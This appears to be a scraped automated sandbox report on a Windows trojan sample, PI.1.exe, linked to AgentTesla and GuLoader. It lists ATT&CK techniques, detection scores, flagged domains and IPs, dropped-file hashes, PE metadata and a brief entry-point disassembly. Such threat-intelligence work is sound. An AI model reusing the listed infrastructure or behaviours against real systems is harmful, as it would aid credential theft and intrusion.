Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 151 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
18% | ReversingLabs | Win32.Trojan.Generic |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 104.26.13.205 | true | false | high | |
apwisulsel.sa.com | 104.128.228.214 | true | false | unknown | |
scootero.cl | 177.221.140.242 | true | true | unknown | |
mail.scootero.cl | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
true |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.128.228.214 | apwisulsel.sa.com | United States | 7489 | HOSTUS-GLOBAL-ASHostUSHK | false | |
177.221.140.242 | scootero.cl | unknown | 270014 | GRUPOCGLIMITADACL | true | |
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1410985 |
Start date and time: | 2024-03-18 14:29:35 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | PI.1.exe |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winEXE@8/17@3/3 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
- HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: PI.1.exe
Time | Type | Description |
---|---|---|
14:30:29 | API Interceptor | |
14:31:01 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.128.228.214 | Get hash | malicious | AgentTesla, GuLoader | Browse | ||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | AgentTesla, GuLoader | Browse | |||
Get hash | malicious | FormBook, GuLoader | Browse | |||
177.221.140.242 | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
104.26.13.205 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | PureLog Stealer, Targeted Ransomware | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
apwisulsel.sa.com | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
api.ipify.org | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
GRUPOCGLIMITADACL | Get hash | malicious | HTMLPhisher | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Outlook Phishing, HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Amadey, RisePro Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
HOSTUS-GLOBAL-ASHostUSHK | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
37f463bf4616ecd445d4a1937da06e19 | Get hash | malicious | AgentTesla, GuLoader | Browse |
| |
Get hash | malicious | PureLog Stealer, Vidar | Browse |
| ||
Get hash | malicious | Babuk, Djvu | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | AgentTesla, GuLoader | Browse |
| ||
Get hash | malicious | FormBook, GuLoader | Browse |
| ||
Get hash | malicious | Remcos, GuLoader | Browse |
|
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 8003 |
Entropy (8bit): | 4.838950934453595 |
Encrypted: | false |
SSDEEP: | 192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J |
MD5: | 4C24412D4F060F4632C0BD68CC9ECB54 |
SHA1: | 3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF |
SHA-256: | 411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE |
SHA-512: | 6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Celebrates\Natkjole\Capron\Hovedperson16.Red
Download File
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60671 |
Entropy (8bit): | 5.370433568192273 |
Encrypted: | false |
SSDEEP: | 1536:7PC+5AyXVJ+LPKwnj+wS0DrIuocMila+7k5n41rmQqmudQ:7PCcAyslnlS0HIyw5n413T |
MD5: | 540AC23990D2B49C32FF84CC000B23C3 |
SHA1: | 691D545AE850511845833975C401AA6ABDD0FE34 |
SHA-256: | D30BD2868E9C41FBD7F1CCECDE561B9938A02ED98CBCD381D48A1807DA5990DB |
SHA-512: | 6715EC07F0051ECE8C22317E4695709C5FCF9ABD46C66267CF20D6B0D9A2088B87D78785D25229C5863615E00177FAB6111388E4093FCF1C79FEEA83C9189A5E |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 676400 |
Entropy (8bit): | 7.981646328069462 |
Encrypted: | false |
SSDEEP: | 12288:iq3hN3sqXCPo54Ca4BpOrQhH1CRjU0u3FZWTzge:phFslgmKpOEVCq0cszge |
MD5: | FC8B93107558429854146361DA62E618 |
SHA1: | E4A2DE78806DBC296AC97505F097E077E798DDF3 |
SHA-256: | F27DDC5F225F50A392BFCF9CBD59557D445F5AD47F1AD31F1A899AEC1EC92611 |
SHA-512: | F58AE25DDC3D5C7F4F88C7285F028A9F17B6ED0DDDA40A8DDEA937E9AFA3377DF5525B857B0A23BED1E31E377291C538896C0D931822DCB32C87BA60DAAF7708 |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Kisang\PI.1.exe:Zone.Identifier
Download File
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 501160 |
Entropy (8bit): | 0.427849268324025 |
Encrypted: | false |
SSDEEP: | 768:y45AJ3HAn1+X49P31RfZsX38AmIptAXMHmgrIN1iWqkCyfuF0n3dlU7zJunl7Xdp:6OlRDr9VJ |
MD5: | 6BCE0CA13EB1A84BB040CCA65C0D6EAD |
SHA1: | 419A05D6AF85113A6BB84505A5C2A2C4F92ECE66 |
SHA-256: | 20D78462D0810604C09CB8E563E24B8EB56FDE0F04508C9B0ADBC2FEFEC8E038 |
SHA-512: | 139585A6736B7F4C38061BDD2E85371F264776E5126A978DE376BEEA5FEE2268D35592B9311BE111D694B18205A22AC3AB1C75224086B5E9AFAFD532C5AF2EE1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\retardment.txt
Download File
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.2104275432009866 |
Encrypted: | false |
SSDEEP: | 12:xDoUiqHW+bACH3NWKMvXREXan3SNG0dVn0wOCFLFM3EPON8u3JDo:xELutH3NHEyXY3oJn0wtFxM3AOr3Zo |
MD5: | 3EF314D41937B9297C75C4DF2FF44066 |
SHA1: | D4E3480082A7427713BA40EA7BD73C61B3C5B0C2 |
SHA-256: | 32BFD7D09ACADA0A2768D33D11EEB281ADD80822DBC1057B8BD41B1CF088D14A |
SHA-512: | 7CB4A9FE5A459BC6A5406359069DE40CD4955D008F4E0281E7CE471356F729EF1CA293A78C688FFBE61E0E705704DD82D275A32EFDF4202C5703E97012D7A41A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\siegeable.dog
Download File
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 493108 |
Entropy (8bit): | 0.4273552847351269 |
Encrypted: | false |
SSDEEP: | 768:dr5+gwk6XvIKn1tL4RZXK0mxQqfInscnG02xI0tKwalSg99Py2:oaGF |
MD5: | 2F9C01D770E57619866DD400A0D58C69 |
SHA1: | 3F080E659387A2B1CCE1EC9AE0829F459606AB6A |
SHA-256: | 79CFC9F743DA4A74A149880D21848846FF3B4FEF9D5C976435AC04FE9AEFED49 |
SHA-512: | C8B0F1F1D44223A3BF3E6D3500E5886A5B16C4D449934D5BE4F397E412EE8EBB62292F6D861F0000630ADA341C95E50114C1B38400916D07EBDB267686E23354 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\dyrekllers\Sanguine\Solano\Microhymenopteron\Unensured\slobberchops.fro
Download File
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 368497 |
Entropy (8bit): | 0.4293198022806828 |
Encrypted: | false |
SSDEEP: | 768:bVfRiZB5X9qpV54NkI9au6EC0gNgC8jif39/:RT5h |
MD5: | 907586A834D70BEF733608584462333D |
SHA1: | CBD48A0A5766E387F620B5542ECD7D7488CB19E2 |
SHA-256: | E4DD8D3AC9956E34A04CB0B0549B00EC86D754B8536E358161B8113372C48F11 |
SHA-512: | 9BE86D4749ACEAF5AFD93134D8D6582AE72BC22927C240C043BC0738BF9768B787FA12C8440AFAC3737E590A89B07F7E9FCB96D28267BFCC55DF51E326ECD765 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 626931 |
Entropy (8bit): | 0.4278272626088943 |
Encrypted: | false |
SSDEEP: | 768:8zRPhO9NvGsNoxfgrPWy4DqaiI+zCAuGhOThbQZMsPhrV+NOAq7XWamtUbuTAO8E:mQmPK |
MD5: | 70D90FD1CD0BDB03FEEB2B0D3F99079E |
SHA1: | 9CA52D43D737DCC20559631FE8D882943B08D074 |
SHA-256: | 38F2D5C8426CDE8E7F71902786319D74E83097FA98684EEC25BC113DAC2C92B4 |
SHA-512: | DA094FF68E227C57E4FD4410C4CB6901B50C0959D3A7CB2AC8F133737FD934A712E6FE8E580C081736392661F3CA84E6840FB11130E2559E95523E350FAA7FB0 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 539198 |
Entropy (8bit): | 0.42848411491162797 |
Encrypted: | false |
SSDEEP: | 768:fdOj3JGFV2TG6g0KtnTXjbp+ltNL2Gebzafnr4235xB49/VRs2+kx0b:ba |
MD5: | 6029D038B7329CFB3D7E8CF684E6695F |
SHA1: | 302E7652241C66E524CD90CBDEF54E6BB785C147 |
SHA-256: | 903F2E66EF3EBCB1D68D68DED2A7D073E9497426D8AE545C4FECC3AE36102876 |
SHA-512: | F82C03C4DC98B02688FB623D04AB3E96660120BE43CC3143632F0082B8F497497F911C3FFC36B98AB1BF0CBDBA6D4B4253D6E5E509EA4152BA287EDAB5EE8498 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 345754 |
Entropy (8bit): | 7.588077185899434 |
Encrypted: | false |
SSDEEP: | 6144:opbyZqtDH+pfUjNzI4f9MEoGUT+06x7AvsRy72RKRcBmNdf:myZqtDHiUVJ6bTqcsk7D0mbf |
MD5: | F4F5F761A5B85A812C075244065E16B2 |
SHA1: | 63477190510A70AF19D1A778DE4CBF4119D851DA |
SHA-256: | 28E42CBB0ABF489957AA0DB7CA451094FDC62074105058E833FFDC33A87CCC18 |
SHA-512: | C8CAE949EAA9B0F316288626B9F48519BF4585B1339E0BB5A5F23B1086C0FCC4E6BE1CB9210F908A5898493C0E97794C924F5D1AE37DA71A9E1957D48DEC1BA2 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 638818 |
Entropy (8bit): | 0.42938170452640034 |
Encrypted: | false |
SSDEEP: | 768:aX3/vUFACJ4C2iMcJ43OqqPDF7fjkTgh0QATBetVyDFSM/48QDNRT0mRRri/XCz6:c/OTz |
MD5: | DE270E12009EBD963A6B6E69A25ECE6E |
SHA1: | AE78C4E4DC5AD764947B750DF7935B8EEC9BFBA1 |
SHA-256: | C5BC74C0B4E45143B27A49E05B64E7194F2122A46101A8298DB8B9BE00261900 |
SHA-512: | 427E22DB5A16EED67A4C8CEBBAD624A32F05813B299267A36BC5B3911AAA778B45DBD588040C68BB13C56D1C0097E96F751E32B75111E7789C934AE6148B2B62 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 531654 |
Entropy (8bit): | 0.42440824856699727 |
Encrypted: | false |
SSDEEP: | 768:Dcvsbg80cabdTp6AqyT3FQcEmXmJwNUrIPcwfvsPslWNrH2jWf7pI6kdUU:SkQ |
MD5: | 0BE211CCC00D63E61ED2BC0DD9B235DD |
SHA1: | 4379CB5404D779802415928DF274205515428CA0 |
SHA-256: | 8D9E7F195BF394D19EDBEC63B3D5D98078A2D0301D0773768C2E9C22DFD44734 |
SHA-512: | 22417099D8DBEA85D2AFD477922DEE9305F9AA5AE7B7D8C4CA671D46374E5E0C2F5654328977AED8D1C6A774018ED8AA53579B52C374875B54EA0BD8B17EB0EF |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 362335 |
Entropy (8bit): | 0.4259574092171849 |
Encrypted: | false |
SSDEEP: | 768:o2yFOEUZPQPBuL6ybmVmhVZo1wJI5JYGetEvtKr2ywca+:Tb1an+ |
MD5: | 75D1B36BE27070EC15B3B28EC5DFC274 |
SHA1: | 9DC46D9233D19C26790AAFBD3FD77339C4E78290 |
SHA-256: | 2B4E2D882ACFBE1FDC6194DEF7EDBF6F99FFD22EAF819FF799920F3584BE2207 |
SHA-512: | AEB7BD282F44D6C2F3E024926080C2FFA1AAF8019039D1DD9CA74E456A4A1CFF50B307EA6A724AA64A728A0846FE5A3ADDAD986435098561D03B05C840623326 |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\PI.1.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 570947 |
Entropy (8bit): | 0.42925029539660764 |
Encrypted: | false |
SSDEEP: | 768:s0+6mmLsVPfIKyil+s1L574VKugswmOhurOFs03QvrQeIIbZvgORkNOJMWdL7uOE:eP4yW |
MD5: | 195AECB894613B3C3124D89849426695 |
SHA1: | CF6F2D47B11F05939527CF9B27F251433A01DA00 |
SHA-256: | E95873427E21CBC238570E6932BBF3DC8AF8B6A357ECC4B56F4E03C1CF97C583 |
SHA-512: | 8E407290AC877E2AE5291EBB22EB6291DEBFE0C3F4CDD688379BF0F57C639D1B19840454386EA9A6ABE9A0B91FD46D174FD6FCBC09D8AF93835CE550EFF74471 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.981646328069462 |
TrID: |
|
File name: | PI.1.exe |
File size: | 676'400 bytes |
MD5: | fc8b93107558429854146361da62e618 |
SHA1: | e4a2de78806dbc296ac97505f097e077e798ddf3 |
SHA256: | f27ddc5f225f50a392bfcf9cbd59557d445f5ad47f1ad31f1a899aec1ec92611 |
SHA512: | f58ae25ddc3d5c7f4f88c7285f028a9f17b6ed0ddda40a8ddea937e9afa3377df5525b857b0a23bed1e31e377291c538896c0d931822dcb32c87ba60daaf7708 |
SSDEEP: | 12288:iq3hN3sqXCPo54Ca4BpOrQhH1CRjU0u3FZWTzge:phFslgmKpOEVCq0cszge |
TLSH: | 97E4238CE3ADDD13E207473255B2EEF7B07A6A51196E090BA7102F6ABC607C0DC95E71 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@ |
Icon Hash: | 3d2e0f95332b3399 |
Entrypoint: | 0x40326a |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57956391 [Mon Jul 25 00:55:45 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e2a592076b17ef8bfb48b7e03965a3fc |
Signature Valid: | false |
Signature Issuer: | E=Lymphangioendothelioma@Untarnishedness.Sv, O=Alexiss, OU="Dimmy Hillerdianer phleborrhage ", CN=Alexiss, L=Paris La D\xe9fense, S=\xcele-de-France, C=FR |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | D4F02815E92198CFC1127FF5CBECA3BD |
Thumbprint SHA-1: | C164215ED66E5A63F0BDF2D6CAFE589387478411 |
Thumbprint SHA-256: | 2C9F994CD877953391BFEAE1978421BAA742729F4DE676B95D43C6999535E589 |
Serial: | 03D06D353419D1698E4B5F16798A7C3696FD6104 |
Instruction |
---|
sub esp, 000002D4h |
push ebx |
push esi |
push edi |
push 00000020h |
pop edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+14h], ebx |
mov dword ptr [esp+10h], 004092E0h |
mov dword ptr [esp+1Ch], ebx |
call dword ptr [004070B0h] |
call dword ptr [004070ACh] |
cmp ax, 00000006h |
je 00007F961D46B713h |
push ebx |
call 00007F961D46E854h |
cmp eax, ebx |
je 00007F961D46B709h |
push 00000C00h |
call eax |
mov esi, 004072B8h |
push esi |
call 00007F961D46E7CEh |
push esi |
call dword ptr [0040715Ch] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], 00000000h |
jne 00007F961D46B6ECh |
push ebp |
push 00000009h |
call 00007F961D46E826h |
push 00000007h |
call 00007F961D46E81Fh |
mov dword ptr [00429204h], eax |
call dword ptr [0040703Ch] |
push ebx |
call dword ptr [004072A4h] |
mov dword ptr [004292B8h], eax |
push ebx |
lea eax, dword ptr [esp+34h] |
push 000002B4h |
push eax |
push ebx |
push 004206A8h |
call dword ptr [00407188h] |
push 004092C8h |
push 00428200h |
call 00007F961D46E408h |
call dword ptr [004070A8h] |
mov ebp, 00434000h |
push eax |
push ebp |
call 00007F961D46E3F6h |
push ebx |
call dword ptr [00407174h] |
add word ptr [eax], 0000h |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7504 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4b000 | 0xd30 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa3968 | 0x18c8 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b4 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5ff9 | 0x6000 | 34f0469eb860d5ecf0e52ef9d3820a60 | False | 0.6667073567708334 | data | 6.4734859396670705 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x13a4 | 0x1400 | 848ecd58951d0a4cfe8ec8cfce6b20d1 | False | 0.452734375 | data | 5.125569346027248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x202f8 | 0x600 | 3953dbb7217e7539ee75e90871f7aef9 | False | 0.4947916666666667 | data | 3.9050018847265378 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2a000 | 0x21000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
